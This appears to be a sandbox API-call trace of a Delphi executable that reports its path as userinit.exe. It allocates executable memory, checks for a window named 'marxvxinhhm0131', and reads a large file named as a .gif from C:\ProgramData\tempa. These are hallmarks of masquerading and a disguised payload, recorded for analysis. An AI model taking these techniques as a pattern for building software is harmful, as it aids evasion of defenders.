[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0097.058] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0097.059] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0097.059] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0097.059] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0097.059] GetVersion () returned 0x1db10106
[0097.059] GetCurrentProcessId () returned 0xf74
[0097.059] GlobalAddAtomA (lpString="Delphi00000F74") returned 0xc14e
[0097.060] GetCurrentThreadId () returned 0xf78
[0097.060] GlobalAddAtomA (lpString="ControlOfs0040000000000F78") returned 0xc14d
[0097.060] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000F78") returned 0xc15f
[0097.060] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0097.060] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0097.060] GetSystemMetrics (nIndex=19) returned 1
[0097.091] GetSystemMetrics (nIndex=75) returned 1
[0097.091] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x471310, fWinIni=0x0 | out: pvParam=0x471310) returned 1
[0097.091] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0097.091] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0097.091] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x201c9
[0097.091] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0097.091] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0097.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0097.092] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x201c7
[0097.092] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x201c5
[0097.092] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x201d5
[0097.092] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x2020f
[0097.092] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x2022d
[0097.092] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x20229
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0097.093] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0097.093] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0097.093] GetDC (hWnd=0x0) returned 0x6010890
[0097.093] GetDeviceCaps (hdc=0x6010890, index=90) returned 96
[0097.093] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0097.093] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0097.093] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x47155c) returned 1
[0097.093] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x22fb0f, fWinIni=0x0 | out: pvParam=0x22fb0f) returned 1
[0097.093] CreateFontIndirectA (lplf=0x22fb0f) returned 0xe0a083d
[0097.093] GetObjectA (in: h=0xe0a083d, c=60, pv=0x22f900 | out: pv=0x22f900) returned 60
[0097.094] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x22f9bb, fWinIni=0x0 | out: pvParam=0x22f9bb) returned 1
[0097.094] CreateFontIndirectA (lplf=0x22fa97) returned 0x160a0864
[0097.094] GetObjectA (in: h=0x160a0864, c=60, pv=0x22f900 | out: pv=0x22f900) returned 60
[0097.094] CreateFontIndirectA (lplf=0x22fa5b) returned 0x170a0863
[0097.094] GetObjectA (in: h=0x170a0863, c=60, pv=0x22f900 | out: pv=0x22f900) returned 60
[0097.094] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0097.094] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x22fa6f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0097.094] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x22fa6f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0097.094] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x1a0000
[0097.094] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x22fa24 | out: lpWndClass=0x22fa24) returned 0
[0097.094] RegisterClassA (lpWndClass=0x451c88) returned 0x20c164
[0097.094] GetSystemMetrics (nIndex=0) returned 1440
[0097.094] GetSystemMetrics (nIndex=1) returned 900
[0097.094] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x201e2
[0097.098] SetWindowLongA (hWnd=0x201e2, nIndex=-4, dwNewLong=1708015) returned 4219500
[0097.098] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0097.098] SendMessageA (hWnd=0x201e2, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0097.098] DefWindowProcA (hWnd=0x201e2, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0097.110] DefWindowProcA (hWnd=0x201e2, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x2022b
[0097.110] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0097.110] SetClassLongA (hWnd=0x201e2, nIndex=-14, dwNewLong=65575) returned 0x0
[0097.111] GetSystemMenu (hWnd=0x201e2, bRevert=0) returned 0x20213
[0097.113] DeleteMenu (hMenu=0x20213, uPosition=0xf030, uFlags=0x0) returned 1
[0097.113] DeleteMenu (hMenu=0x20213, uPosition=0xf000, uFlags=0x0) returned 1
[0097.113] DeleteMenu (hMenu=0x20213, uPosition=0xf010, uFlags=0x0) returned 1
[0097.113] GetKeyboardLayoutList (in: nBuff=64, lpList=0x22f9f0 | out: lpList=0x22f9f0) returned 1
[0097.114] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0097.114] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0097.114] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0097.115] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0097.115] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0097.115] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0097.115] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0097.115] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0097.116] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0097.116] GetCurrentThreadId () returned 0xf78
[0097.116] GlobalAddAtomA (lpString="WndProcPtr0040000000000F78") returned 0xc14c
[0097.116] VirtualAlloc (lpAddress=0x474000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x474000
[0097.116] ShowWindow (hWnd=0x201e2, nCmdShow=0) returned 0
[0097.116] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0097.116] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0097.116] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x22f770*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x22f770*=0) returned 0x0
[0097.117] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x22f768*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x22f768*=0) returned 0x0
[0097.117] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x22f768*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f768*=0) returned 0x10be00
[0097.117] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x22f768*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x22f768*=0) returned 0x0
[0097.117] GlobalLock (hMem=0x830004) returned 0x23b0020
[0097.117] ReadFile (in: hFile=0x98, lpBuffer=0x23b0020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x22f784, lpOverlapped=0x0 | out: lpBuffer=0x23b0020*, lpNumberOfBytesRead=0x22f784*=0x10be00, lpOverlapped=0x0) returned 1
[0097.181] CloseHandle (hObject=0x98) returned 1
[0097.181] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.182] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.182] GlobalUnlock (hMem=0x83000c) returned 0
[0097.182] GlobalReAlloc (hMem=0x83000c, dwBytes=0x4000, uFlags=0x2) returned 0x83000c
[0097.182] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.183] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.183] GlobalUnlock (hMem=0x83000c) returned 0
[0097.183] GlobalReAlloc (hMem=0x83000c, dwBytes=0x6000, uFlags=0x2) returned 0x83000c
[0097.184] GlobalLock (hMem=0x83000c) returned 0x5ea820
[0097.184] GlobalHandle (pMem=0x5ea820) returned 0x83000c
[0097.184] GlobalUnlock (hMem=0x83000c) returned 0
[0097.184] GlobalReAlloc (hMem=0x83000c, dwBytes=0x8000, uFlags=0x2) returned 0x83000c
[0097.185] GlobalLock (hMem=0x83000c) returned 0x5f0830
[0097.185] GlobalHandle (pMem=0x5f0830) returned 0x83000c
[0097.185] GlobalUnlock (hMem=0x83000c) returned 0
[0097.186] GlobalReAlloc (hMem=0x83000c, dwBytes=0xa000, uFlags=0x2) returned 0x83000c
[0097.186] GlobalLock (hMem=0x83000c) returned 0x5f0830
[0097.186] GlobalHandle (pMem=0x5f0830) returned 0x83000c
[0097.186] GlobalUnlock (hMem=0x83000c) returned 0
[0097.186] GlobalReAlloc (hMem=0x83000c, dwBytes=0xc000, uFlags=0x2) returned 0x83000c
[0097.187] GlobalLock (hMem=0x83000c) returned 0x5fa840
[0097.188] GlobalHandle (pMem=0x5fa840) returned 0x83000c
[0097.188] GlobalUnlock (hMem=0x83000c) returned 0
[0097.188] GlobalReAlloc (hMem=0x83000c, dwBytes=0xe000, uFlags=0x2) returned 0x83000c
[0097.188] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.188] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.188] GlobalUnlock (hMem=0x83000c) returned 0
[0097.189] GlobalReAlloc (hMem=0x83000c, dwBytes=0x10000, uFlags=0x2) returned 0x83000c
[0097.189] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.189] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.189] GlobalUnlock (hMem=0x83000c) returned 0
[0097.189] GlobalReAlloc (hMem=0x83000c, dwBytes=0x12000, uFlags=0x2) returned 0x83000c
[0097.189] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.190] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.190] GlobalUnlock (hMem=0x83000c) returned 0
[0097.190] GlobalReAlloc (hMem=0x83000c, dwBytes=0x14000, uFlags=0x2) returned 0x83000c
[0097.190] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.191] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.191] GlobalUnlock (hMem=0x83000c) returned 0
[0097.191] GlobalReAlloc (hMem=0x83000c, dwBytes=0x16000, uFlags=0x2) returned 0x83000c
[0097.191] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.191] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.191] GlobalUnlock (hMem=0x83000c) returned 0
[0097.191] GlobalReAlloc (hMem=0x83000c, dwBytes=0x18000, uFlags=0x2) returned 0x83000c
[0097.191] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.192] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.192] GlobalUnlock (hMem=0x83000c) returned 0
[0097.192] GlobalReAlloc (hMem=0x83000c, dwBytes=0x1a000, uFlags=0x2) returned 0x83000c
[0097.192] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.193] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.193] GlobalUnlock (hMem=0x83000c) returned 0
[0097.193] GlobalReAlloc (hMem=0x83000c, dwBytes=0x1c000, uFlags=0x2) returned 0x83000c
[0097.193] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.194] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.194] GlobalUnlock (hMem=0x83000c) returned 0
[0097.194] GlobalReAlloc (hMem=0x83000c, dwBytes=0x1e000, uFlags=0x2) returned 0x83000c
[0097.194] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.194] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.194] GlobalUnlock (hMem=0x83000c) returned 0
[0097.194] GlobalReAlloc (hMem=0x83000c, dwBytes=0x20000, uFlags=0x2) returned 0x83000c
[0097.194] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.195] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.195] GlobalUnlock (hMem=0x83000c) returned 0
[0097.195] GlobalReAlloc (hMem=0x83000c, dwBytes=0x22000, uFlags=0x2) returned 0x83000c
[0097.197] GlobalLock (hMem=0x83000c) returned 0x606820
[0097.198] GlobalHandle (pMem=0x606820) returned 0x83000c
[0097.198] GlobalUnlock (hMem=0x83000c) returned 0
[0097.198] GlobalReAlloc (hMem=0x83000c, dwBytes=0x24000, uFlags=0x2) returned 0x83000c
[0097.198] GlobalLock (hMem=0x83000c) returned 0x606820
[0097.199] GlobalHandle (pMem=0x606820) returned 0x83000c
[0097.199] GlobalUnlock (hMem=0x83000c) returned 0
[0097.199] GlobalReAlloc (hMem=0x83000c, dwBytes=0x26000, uFlags=0x2) returned 0x83000c
[0097.201] GlobalLock (hMem=0x83000c) returned 0x62a830
[0097.201] GlobalHandle (pMem=0x62a830) returned 0x83000c
[0097.201] GlobalUnlock (hMem=0x83000c) returned 0
[0097.201] GlobalReAlloc (hMem=0x83000c, dwBytes=0x28000, uFlags=0x2) returned 0x83000c
[0097.202] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.202] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.202] GlobalUnlock (hMem=0x83000c) returned 0
[0097.202] GlobalReAlloc (hMem=0x83000c, dwBytes=0x2a000, uFlags=0x2) returned 0x83000c
[0097.202] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.203] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.203] GlobalUnlock (hMem=0x83000c) returned 0
[0097.203] GlobalReAlloc (hMem=0x83000c, dwBytes=0x2c000, uFlags=0x2) returned 0x83000c
[0097.203] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.204] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.204] GlobalUnlock (hMem=0x83000c) returned 0
[0097.204] GlobalReAlloc (hMem=0x83000c, dwBytes=0x2e000, uFlags=0x2) returned 0x83000c
[0097.204] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.204] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.204] GlobalUnlock (hMem=0x83000c) returned 0
[0097.204] GlobalReAlloc (hMem=0x83000c, dwBytes=0x30000, uFlags=0x2) returned 0x83000c
[0097.204] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.205] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.205] GlobalUnlock (hMem=0x83000c) returned 0
[0097.205] GlobalReAlloc (hMem=0x83000c, dwBytes=0x32000, uFlags=0x2) returned 0x83000c
[0097.205] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.206] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.206] GlobalUnlock (hMem=0x83000c) returned 0
[0097.206] GlobalReAlloc (hMem=0x83000c, dwBytes=0x34000, uFlags=0x2) returned 0x83000c
[0097.206] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.207] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.207] GlobalUnlock (hMem=0x83000c) returned 0
[0097.207] GlobalReAlloc (hMem=0x83000c, dwBytes=0x36000, uFlags=0x2) returned 0x83000c
[0097.207] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.207] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.207] GlobalUnlock (hMem=0x83000c) returned 0
[0097.207] GlobalReAlloc (hMem=0x83000c, dwBytes=0x38000, uFlags=0x2) returned 0x83000c
[0097.207] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.208] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.208] GlobalUnlock (hMem=0x83000c) returned 0
[0097.208] GlobalReAlloc (hMem=0x83000c, dwBytes=0x3a000, uFlags=0x2) returned 0x83000c
[0097.208] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.209] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.209] GlobalUnlock (hMem=0x83000c) returned 0
[0097.209] GlobalReAlloc (hMem=0x83000c, dwBytes=0x3c000, uFlags=0x2) returned 0x83000c
[0097.209] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.210] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.210] GlobalUnlock (hMem=0x83000c) returned 0
[0097.210] GlobalReAlloc (hMem=0x83000c, dwBytes=0x3e000, uFlags=0x2) returned 0x83000c
[0097.210] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.210] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.210] GlobalUnlock (hMem=0x83000c) returned 0
[0097.210] GlobalReAlloc (hMem=0x83000c, dwBytes=0x40000, uFlags=0x2) returned 0x83000c
[0097.210] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.211] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.211] GlobalUnlock (hMem=0x83000c) returned 0
[0097.211] GlobalReAlloc (hMem=0x83000c, dwBytes=0x42000, uFlags=0x2) returned 0x83000c
[0097.211] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.212] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.212] GlobalUnlock (hMem=0x83000c) returned 0
[0097.212] GlobalReAlloc (hMem=0x83000c, dwBytes=0x44000, uFlags=0x2) returned 0x83000c
[0097.212] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.259] GlobalHandle (pMem=0x5e6810) returned 0x83000c
